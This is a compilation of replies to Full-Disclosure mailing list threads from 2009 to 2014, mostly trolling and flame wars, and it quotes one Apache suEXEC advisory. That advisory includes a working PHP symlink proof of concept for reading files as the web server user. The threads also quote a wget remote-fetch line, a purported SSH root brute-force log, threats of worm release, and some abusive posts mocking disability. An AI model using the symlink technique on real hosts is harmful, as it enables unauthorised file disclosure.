Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Ooh goodie, where and what happened to N3td3v, he used to crack me up :D :D
On 3/17/14, Mario Vilas mvi...@gmail.com wrote:
ROFL
[image: Inline image 1]
On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim
timbra...@techemail.comwrote:
What drugs are you on Pedro Ribeiro I wonder ...?
I express my views, if you don't like don't watch them. You responses so
far have only been assy speculations so don't tell me Im wrong , and
please
don't say thing like that. I don't know who the other people is, but
what
is true in security I support. Why you would Google my name ... ?
Is the English language causing you ill effects?
--- ped...@gmail.com wrote:
From: Pedro Ribeiro ped...@gmail.com
To: timbra...@techemail.com
Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski
lcam...@coredump.cx, mvi...@gmail.com, gynv...@coldwind.pl
Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Date: Mon, 17 Mar 2014 09:24:08 +
On 16 Mar 2014 23:36, T Imbrahim timbra...@techemail.com wrote:
The thread read Google vulnerabilities with PoC. From my understanding
it was a RFI vulnerability on YouTube, and I voiced my support that this
is a vulnerability.
I also explained a JSON Hijacking case as a follow up, and you said you
didn't follow. So I am just saying that treating security that way,
there
are other parties like NSA who welcome them happily.
I think these guys - Alfred, Kirschbaum and Imbrahim are the OP's sock
puppets.
They are all first time posters from unusual free email providers jumping
to defend the OP out of nowhere. If you search Google for their emails
you
only find references to this thread.
They present similar (false and /or incorrect) arguments, talk about
their
extensive work experience, bash Google and its security team and send
repeated emails with exactly the same text.
This is turning into a madhouse... I hope this guy doesn't have access to
a gun.
Regards
Pedro
--
Are you a Techie? Get Your Free Tech Email Address Now! Visit
http://www.TechEmail.com
--
There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
How the hell did you ever think Google will honor this? By now they
could be fixing this issue, they hell don't care about you.
On 3/15/14, Georgi Guninski gunin...@guninski.com wrote:
Is it possible with the help of Godwin's law
this discussion moves offlist?
--
guninski
On Thu, Mar 13, 2014 at 10:43:50AM +, Nicholas Lemonias. wrote:
Google vulnerabilities uncovered...
http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
One thing u gotta remember most of the Admins who handle webservers in a network are also developers since most of the organizations will always need to cut on expenses, and as we know, most of the developers will just look into finishing work and making it work. So if something doesn't run due to httpd.conf, you will find these guys loosening server security, therefore opening holes to the infrastructure. Just my two cents ./Chucks On 8/10/13, Kingcope isowarez.isowarez.isowa...@googlemail.com wrote: Uhh Hit em with a little Ghetto Gospel So am i less holy Because i Puff a blunt and Drink a Beer with my homies? Theres no Need for you to fear me if you Take your Time and Hear me Maybe you can learn to cheer me. It aint about Black and white cause we Human !!! Lord can you Hear me speaaak!! http://rapgenius.com/2pac-ghetto-gospel-lyrics Am 09.08.2013 um 16:33 schrieb Kingcope isowarez.isowarez.isowa...@googlemail.com: So the blackhat that Sits on ur Site and the site of ur company Since half a year will stop at the point Where its technically incorrect and wont escalate to root because it doesnt have to do Anything with suexec. Its an Old vuln so let it stay , better for us and soon our Data on your boxes. Time to Write a Real Root exploit and dont waste the Time with sysadmins that know how to set a flag in httpd.conf , apache devs included. Am 09.08.2013 um 14:29 schrieb Kingcope isowarez.isowarez.isowa...@googlemail.com: So what your Emails Tell me is better ignore this vulnerability. I dont Claim its a High severity Bug but if you Tell People to ignore it Because it isnt a vulnerability you are very much aiding the Chaos of insecurity in the Internet today. You Maybe have a Secure Setting but theres only you on the Planet. Attackers Look specifically for such Bugs to Open Servers. No Wonder we have compromises in a High Scale every Day due to this ignorance. My rant on that One. Am 07.08.2013 um 21:49 schrieb king cope isowarez.isowarez.isowa...@googlemail.com: Apache suEXEC privilege elevation / information disclosure Discovered by Kingcope/Aug 2013 The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs. With this bug an attacker who is able to run php or cgi code inside a web hosting environment and the environment is configured to use suEXEC as a protection mechanism, he/she is able to read any file and directory on the file- system of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user- id inside a suEXEC configured environment. Take for example this apache owned file and the php script that follows. $ ls -la /etc/testapache -rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache only user www-data should be able to read this file. $ cat test.php ?php system(id; cat /etc/testapache); ? When calling the php file using a webbrowser it will show... uid=1002(example) gid=1002(example) groups=1002(example) because the php script is run trough suEXEC. The script will not output the file requested because of a permissions error. Now if we create a .htaccess file with the content... Options Indexes FollowSymLinks and a php script with the content... ?php system(ln -sf / test99.php); symlink(/, test99.php); // try builtin function in case when //system() is blocked ? in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'. A request to test99.php/etc/testapache done with a web browser shows.. voila! read with the apache uid/gid The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case. Version notes. Assumed is that all Apache versions are affected by this bug. apache2 -V Server version: Apache/2.2.22 (Debian) Server built: Mar 4 2013 21:32:32 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.6, APR-Util 1.4.1 Compiled using: APR 1.4.6, APR-Util 1.4.1 Architecture: 32-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) Server compiled with -D APACHE_MPM_DIR=server/mpm/worker -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
What happened to the link.
On 6/8/13, kai k...@rhynn.net wrote:
wget http://botslayer.ru/final_solution.txt
i've registered this domain just to save incompetent shitheads who blindly
run any code which is supposed to fix security problem. why have you
included the non-existent domain in your code?
thanks for your interesting investigation anyway.
Cheers,
Kai
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LulzSec EXPOSED!
I think its just a bruteforce.
On 6/6/11, Andreas Bogk andr...@andreas.org wrote:
Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
Lulzsec == pwnt
I've seen the log you pasted to pastebin. Is this:
* A timing attack on ssh passwords over the net?
* Fake, to distract us from your real 0day?
Andreas
Log:
root@gibson:~# ./1337hax0r 204.188.219.88 -root
Attempting too hax0r root password on 204.188.219.88
h,VhXzavMm
3xLl1-_\wC
ffsakTgyc~H
ZZrz,pJrgB
b{4Bv_Y$$Z6
XDh;vDU-;3
FB-hvg%g_'t
}qHNvkS'g
RNBKvUi5yO|
z`(}v1^u
*V4?vh9#^f2
/R*9vfhZ#
9P65vjKhh.N
\rfsv~PhNDz
Bfpv|uhGpy
J%kvf]hGf0
sY0v{2hf7p
9dev%Qh6_v
*Tbv7?h.**
}:lkvV^hN2U
;5Xv'Sh#}_
MOqpvi_hg+#
Md9/viVhu7
M(%rvomhb'
MI5v_shEVe
M=@?vl.hZge
MPk5v:WhUTe
M=3vvrzh7Te
M'?v]sh`Te
M/Z,vI1h`Te
M.9vO$hTTe
Ms!(vY;hpTe
MA)SvYLhnTe
M7eCv@Lh0Te
MkeCvFLh$Te
M'eCv?LhaTe
MeCvLLh|Te
M*eCv5Lh\Te
MmeCvcLhCTe
MTeCvLhrTe
M,eCv1LhYTe
MEeCv}LhHTe
M_eCvSLhnTe
MPeCvSLh+Te
M[eCvSLh,Te
MOeCvSLhTe
M7eCvSLhTe
MGeCvSLhdTe
M$eCvSLhkTe
MCeCvSLhkTe
MLeCvSLhkTe
M=eCvSLhkTe
M-eCvSLhkTe
MweCvSLhkTe
M=eCvSLhkTe
M3eCvSLhkTe
M6eCvSLhkTe
MreCvSLhkTe
M6eCvSLhkTe
MFeCvSLhkTe
MSeCvSLhkTe
M8eCvSLhkTe
Password hax0rd! root password: M8eCvSLhkTe
root@gibson:~# ssh 204.188.219.88
root@204.188.219.88's password:
root@xyz:~# hostname; id; w
xyz
uid=0(root) gid=0(root) groups=0(root)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor
God, i cant even understand half the shit he is saying? English so upside down!
On 12/17/10, Christian Sciberras uuf6...@gmail.com wrote:
HAHAHAHAHAH!!
GOD so are funny you!11
2010/12/16 musnt live musntl...@gmail.com
OpenBSD is Backdoor facts
1) Is we look to monkey.org posting, we is see Theo make is change to
CVS for this portion of code is work on by Jason (name is mentioned by
Perry)
2) Is we look at timeframe for Backdoor, is code be in 2.5 or 2.6,
musn't live theorize 2.6
* 2.6: December 1, 1999 -
* Based on the original SSH suite and developed further by the OpenBSD
team, 2.6 saw the first release of OpenSSH, which is now available
standard on most Unix-like operating systems and is the most widely
used SSH suite.
http://en.wikipedia.org/wiki/Timeline_of_OpenBSD
3) Is Theo not deny there is no backdoor, only say he is unaware
(musn't live is unaware of exact time right now, is know time exist!)
a) Theo and OpenBSD not audit anything (trusting trust)
b) pre-emptive is wasn't me from Theo in event truth comes later
Hey I is Theo I do right thing and strike err.. Disclose first! I not
know!
c) all of is the above
4) While is everyone claim Perry прил, is no one else outside of Jason
on OpenBSD is say: Perry is lying even former developers is stay
quiet to protect the DARPA/FBI innocent
5) Is possible at people by mentioned in named by Perry, go to Canada
to hack code and plant is backdoor
6) Old code (2.6) is sayanoruski. Is good luck find mirror. CVS is
controlled by those is accused, quick move and we is have: See is no
backdoor in this backdoor!
7) OpenBSD is the most secure backdoored on the planet
8) Is need slogan change: Only two remote holes in the default
install, in a heck of a long time! (Is besides backdoor!!!)
9) We is all peons to Theo and we is cannot figure out truth as we is
brains are so too small
10) Claims surpass is Microsoft NSA theory
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
waoh. very funny.
On 3/21/10, Andrew Walberg andrew.walb...@rocketmail.com wrote:
Hello.
Everyone here has learned there lesson and has suffered because Andrew
Wallace (n3td3v) has been banned.
n3td3v is a multi-national organization of national security experts who
have been driven to the underground thanks to John Cartwright. Since then,
mossad has been able to infiltrate and cause significant global problems.
n3td3v was offended and furious. He doesn't have 0day. He doesn't hack.
Unban Andrew Wallace and let the information be free.
If you unban him we will finally have justice in this world for n3td3v and
his 5000 employees. Everyone at our office is waiting for your answer, John
Cartwright
__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz
gegen Massenmails.
http://mail.yahoo.com
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
Especially the ones working for governments, the surveillance and
espionage etc, scares more
On 1/4/10, netinfinity netinfinity.security...@gmail.com wrote:
I couldn't agree more with Adriel.
--
netinfinity
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
One of the amazing thing about these hackers calling them antisec
didn't have real hardening on their servers. Most of their servers had
direct public ip on their Interfaces and even their user management
was crappy.
I remember when i heard of antisec i thot these guys were real gurus
with more than 10 years of experience, but after the fake sshd and
fake attacks, and DDOS that meant nothing and now all is lulz, i cant
help but rofl.
./Chuks
On 1/2/10, Jeff Blaum jblau...@gmail.com wrote:
It still does not change the fact that you (Glafkos) are a cock, and that
astalavista is (and was) always a shit stain of a website.
J
On Thu, Dec 31, 2009 at 9:38 AM, Glafkos Charalambous
i...@infosec.org.ukwrote:
.
|
\ * ./
. * * * .
-=* LULZ! *=-
. .* * * .
/* .\
|
.
_ _
( ) ( )
| |_| | _ _ _ __ __ _
| _ | /'_` )( '_`\ ( '_`\ ( ) ( )
| | | |( (_| || (_) )| (_) )| (_) |
(_) (_)`\__,_)| ,__/'| ,__/'`\__, |
| || |( )_| |
(_)(_)`\___/'
_ _ _ _
( ) ( )( ) ( )
| `\| | __ _ _ _ `\`\_/'/'__ _ _ _ __
| , ` | /'__`\( ) ( ) ( )`\ /'/'__`\ /'_` )( '__)
| |`\ |( ___/| \_/ \_/ | | |( ___/( (_| || |
(_) (_)`\)`\___x___/' (_)`\)`\__,_)(_)
anti-sec.com
.
|
\ * ./
. * * * .
-=* RAWR! *=-
. .* * * .
/* .\
|
.
http://www.anti-sec.com
http://pastebin.com/f12f6f9c0
http://pastebin.mozilla.org/694145
http://pastebin.ca/1733192
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Cyber War Conspiracy
K, full-disclos...@safe-mail.net or whoever you are, i think you are
watching too much of 24 or even Spooks. Please quit and relax abit!!!
./Chuks
On 12/5/09, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
--On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote:
On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said:
n3td3v is probably ureleet, full-censorship, full-disclosure, antisec,
jdl and valdis.
He might be those other dudes, but he's not me. If I was going to pose
as
a troll, I'd pose as a more clueful troll - trying to think that
cluelessly
makes my brain hurt.
On the other hand, nobody's ever seen me and Paul Schmehl at the same
place
at the same time... I wonder why... :)
Because we have no travel money. :-)
Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
**
WARNING: Check the headers before replying
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v mentioned in a book?
Maybe its not a Ban, maybe its a burn notice!
On 10/4/09, full-censors...@hushmail.com full-censors...@hushmail.com wrote:
if this guy is mentioned in a book and we banned him?
http://f0rb1dd3n.com/links.php
i'm calling for a serious review of whats going on with the ban
list.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers
Thank you for this my.hndl. There are some issues i have been having
and seems your methodology may work on Fedora and others OSs.
Thankx
./Chuks
On 9/30/09, maxigas maxi...@anargeek.net wrote:
From: bo...@civ.zcu.cz bo...@civ.zcu.cz
Subject: Re: [Full-disclosure] Modifying SSH to Capture Login Credentials
from Attackers
Date: Wed, 30 Sep 2009 00:03:51 +0200
All standard users have read access to /var/log/auth, so if root
they shouldn't, at least on my default debian they don't ...
On my default Ubuntu, users in adm group have reac access to the
authentication log file:
m...@machine: ls -l /var/log/auth.log
-rw-r- 1 syslog adm 46774 2009-09-30 01:10 /var/log/auth.log
--
×× maxigas
// villanypásztor / kiberpunk / web shepherd //
-= Important communication disclaimer: by replying to my emails you are
disclaiming all your disclaimers. =-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v's Twitter account hacked
Just saw that. Thot were new trolls by n3td3v pouring all the way to twitter.
On 9/19/09, The Security Community thesecuritycommun...@gmail.com wrote:
Someone evidently hacked into n3td3v's Twiiter account and is spewing
nonsense.
http://twitter.com/n3td3v
Maybe it's some sort of botnet CC account now, I dunno.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Moar iProphet questions
Now, i think this is really wrong. There is no need of making fun of
someone who is disabled by attacking n3td3v.
On 8/29/09, Gary McKinnon john.wall...@hush.com wrote:
iProphet (weev) Questions
Sorry for being repetitive. FD is mostly hoarsechit and fucin
around anyway (not that you do ANY of that).
My name is Gary McKinnon, I'm the nerd that hacked into the
Pentagon. I'm autistic so I may have difficulty communicating or
understanding you.
HELLO? Can you hear me?
I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions
8==^H^H^H^H^HD
1.) Do you have HIV?
2.) Have you ever anointed anyone with your IRL Virus?
3.) Do you think that you could be prosecuted for hacking if you
give people your IRL badware?
4.) Do the woman you give HIV to go to heaven?
5.) What does your computer screen look like? You run linux? Do you
have an iProphet wallpaper?
6.) When will we be seeing new vlogcasts
7.) Do you plan on writing some subversive PDF's for us?
8.) Do you intend on making a documentary so it can go viral and
cause a revolution?
9.) In your mind, what is your picture of an ideal world?
This post was by Gary McKinnon [SOLO], elite autistic hacker.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] http://secreview.blogspot.com -- end of life
Please bring it back. It was a nice blog, or send me an archive of the ut.
Thankx
./Chuks
On 8/13/09, secrev...@hushmail.me secrev...@hushmail.me wrote:
Hi Everyone,
We received a lot of emails from different people asking us what
happened to our blog at http://secreview.blogspot.com. What
happened is we decided to shut down operations because we don't
have time to keep doing reviews. We also don't have time to redo
reviews which is needed to keep the reviews fair. We all have full
time jobs and recently have been traveling a lot.
We started secreview because we wanted to expose security companies
for what they really were. But now because we can't do it any more
we don't think its fair that only some companies get reviewed and
others don't. So we deleted the blog (but we have 90 days to bring
it back if people want it).
If we do bring it back, we will probably not do any more reviews
and we will leave it up just because. Do people want the blog to be
recovered or do they want us to keep it dead?
-- Secreview
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Redspin, Inc. (C+)
Just read this. What happened to your blog, http://secreview.blogspot.com? On 8/11/09, secreview secrev...@hushmail.com wrote: We received 22 requests from different people to perform a review of Redspin! Their website can be found at http://www.redspin.com. We haven’t done a review of anyone in quite a while, the last review that we did was for Pivot Point Security who got an A (we still recommend them). We apologize for this long delay but we have been very busy traveling (yes we still have jobs doing consulting work sometimes). As you can see from the comments that we received in other posts we have a lot of catch up work to do, but to be honest we are not sure that we will be able to do it. This review might be our final and last review depending on how much more travel we have. (We have lives, some of us have families, and we can’t keep doing this for free even though we feel that this is a great service). We did a lot of research on Redspin and we managed to get a copy of two reports that they did for two different customers. We won’t share those reports with you because that would be unethical, don’t ask. Redspin claims that it is a “pure penetration testing firm”. What they mean by “pure penetration testing” is that they do not resell third party software or hardware. They also say that “don't find problems on your network so that [they] can make more money; [their] penetration testing services reveal vulnerabilities, [that] will help you become more secure.” We verified their claim with our own research. Redspin will not try to sell you software or hardware… but they might try to sell you software as a service. (see their www.jetmetric.com website). Redspin takes it a step further and is brutally honest about their methodology for delivering penetration-testing services. They openly admit that their services rely on automated vulnerability scanners (Nessus) and are enhanced by manual testing. In fact, Redspin says that automated scanners “can miss about 40% of the security risk so they alone do not adequately assess risk. Furthermore, about half of the findings from a vulnerability scan are false positives”. Any security company that relies on automated scanners can weed out false positives, but doing that doesn’t really increase the depth and accuracy of testing. A false positive, also known as an error of the first kind, or a Type I Error, is the rejection of a null hypothesis when it is in fact true. In more simple terms, this is the error of observing a difference when in fact there isn’t one. Identifying false positives is fairly easily done, as it only requires inspecting the results produced by a scanner. But what about False Negatives? A False Negative, also called a Type II Error, or an error of the second kind, is the error of failing to reject a null hypothesis when it is in fact not true. More simply, a False Negative is the error of failing to observe a difference when in truth there is one. So, if an automated vulnerability scanner tests a vulnerable service (a known vulnerability) but the scanner doesn’t detect the vulnerability then the vulnerability is excluded from the report. If this is the case then Redspin’s methodology will break down because there will be no result in the report for Redspin to manually test. That vulnerability will fly under the Redspin radar but might not be missed by a hacker. So how many vulnerabilities does Redspin miss? It’s a question worth asking. Redspin does say that “vulnerability scanning is not suitable on its own as a complete or billable service offering, it does provides some value in the early reconnaissance phase of a more comprehensive External Network Security Assessment”. They have a typo in that sentence, but other than that, they are right. Vulnerability scanning does have a position in the industry and is a huge time saver, especially when testing large numbers of systems. Just don’t rely on one vulnerability scanner like Redspin does, use two or more like the OSSTMM proposes. Redspin says “manual analysis is at the heart of all of [their] assessments which not only gives you confidence that you have a complete view of your security risk, but provides tailored reporting and recommendations enabling simple work-arounds and cost-effective mitigation strategies for most security issues.” Based on our research Redspin’s “manual analysis” isn’t what we expected it to be. It is not based on vulnerability research and is strictly based on the inspection and verification of scanner output. What we can say is that their “manual analysis” doesn’t produce the highest quality reports that ever we’ve seen, but it does produce reports that are higher than average quality. The Redspin reports have very few, if any, False Positives but will contain more False Negatives than a report that is centered on solid (vulnerability) research. One thing that Redspin does
Re: [Full-disclosure] AntiSec PHHEER #1 (anti...@hushmail.com)
i thought the same thing. This guy shud get a life!!!
On 8/9/09, Zloss aza...@gmail.com wrote:
So what the heck are you doing dumbass ?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] anti-sec: OpenSSH = 5.2 zero day exploit code - 48 hours until it is publicly released!
hahaha, now u r releasing it
I thought u guyz dont release or disclose vulnerabilities.
./Chuks
On 7/20/09, Ant-Sec Movement anti.sec.movem...@gmail.com wrote:
Dear Reader,
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.
Soon, the very foundations of Information Technology and Information
Security will be unearthed as millions upon million of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddie and
malicious hacker.
Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
anti-sec will be unleashing powerful computer worm source code with the
ability to auotmatically find and compromise systems running any and all
versions of OpenSSH.
This is an attack against all White Hat Hackers who think that running a
Penetration Test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-sec will savor the moment when
White Hat Hackers are made to look like fools in the eyes of their clients.
Sincerely,
-anti-sec
--
--
Gichuki John Ndirangu,
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
Hehehe, netdev? For real?. He is the Anti-sec. I think thats wrong
On Thu, Jul 16, 2009 at 1:35 PM, Benjamin
Cancecance.consult...@gmail.com wrote:
now we know who antisec are/is, i'm going to bed
Charles Majola wrote:
HAH!
I knew it
On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote:
careful. n3td3v has found his way back onto the list. he is now
posting as ant-sec. he is hacking and spreading disinformation on
full-d.
careful who you talk 2, he has many names.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
